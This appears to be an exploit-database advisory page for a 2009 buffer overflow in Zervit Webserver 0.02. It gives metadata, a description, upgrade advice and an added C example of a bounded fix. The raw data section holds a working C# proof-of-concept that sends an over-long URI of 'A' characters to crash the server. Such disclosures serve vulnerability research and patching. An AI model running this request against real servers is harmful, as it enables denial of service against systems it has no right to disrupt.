Vendor: Zervit Webserver
By: e.wiZz!
CVSS: 9,3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Zervit Webserver
Affected Version From: 0.02
Affected Version To: 0.02
Patch Exists: Yes
Related CWE: N/A
CPE: a:mereo:zervit_webserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Zervit Webserver 0.02 Buffer Overflow

When the requested URI isn't found, it is copied into char tmp[255], which is later used for output; 256 characters are enough to overflow it (see http.c in the source). An attacker can send a maliciously crafted request with 256 characters to the vulnerable server, causing a buffer overflow that allows the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Zervit Webserver.
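
The class of fix the description points to, as an added example (not Zervit's source or its patch): a bounded formatter for the not-found path that rejects an over-long URI instead of copying it into a 255-byte buffer. The function names, the response text and the 414 behaviour are assumptions; only the 255-byte size comes from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define TMP_SIZE 255                 /* size of tmp[] given in the advisory */
#define PREFIX   "404 Not Found: "   /* hypothetical response text */

/* Assumed shape of the bug (http.c itself is not shown on the page):
 *     char tmp[255];
 *     sprintf(tmp, "...%s", uri);   // unbounded copy of the request URI
 */

/* Hypothetical hardened handler. Returns the status to send:
 * 404 when prefix + URI fit in out, 414 when they do not fit or
 * formatting fails (nothing attacker-controlled is echoed),
 * 500 on bad arguments. */
int build_not_found(const char *uri, char *out, size_t out_size)
{
    if (uri == NULL || out == NULL || out_size == 0)
        return 500;
    int n = snprintf(out, out_size, PREFIX "%s", uri);
    if (n < 0 || (size_t)n >= out_size) {      /* error or truncation */
        snprintf(out, out_size, "414 URI Too Long");
        return 414;
    }
    return 404;
}

/* Constructed input: a URI of len bytes ("/" followed by 'A's), written
 * into a tmp[] that sits next to a canary byte. Returns the status, or
 * -1 if the canary was overwritten. */
int status_for_len(size_t len)
{
    struct { char tmp[TMP_SIZE]; unsigned char canary; } frame;
    char uri[1024];
    if (len == 0 || len >= sizeof uri)
        return -1;
    memset(uri, 'A', len);
    uri[0] = '/';
    uri[len] = '\0';
    frame.canary = 0x5A;
    int status = build_not_found(uri, frame.tmp, sizeof frame.tmp);
    return frame.canary == 0x5A ? status : -1;
}

int main(void)
{
    printf("len 20  -> %d\n", status_for_len(20));
    printf("len 256 -> %d\n", status_for_len(256));
    return 0;
}
```

With the 15-byte prefix assumed here, the longest URI that still fits in 255 bytes is 239 characters; the 256-character request from the advisory is answered with 414 and the byte after the buffer is left untouched.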

Exploit-DB raw data:

####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(sajt + uribad);

        HttpWebResponse response = (HttpWebResponse)request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(response.StatusCode);
    }
}

// milw0rm.com [2009-04-15]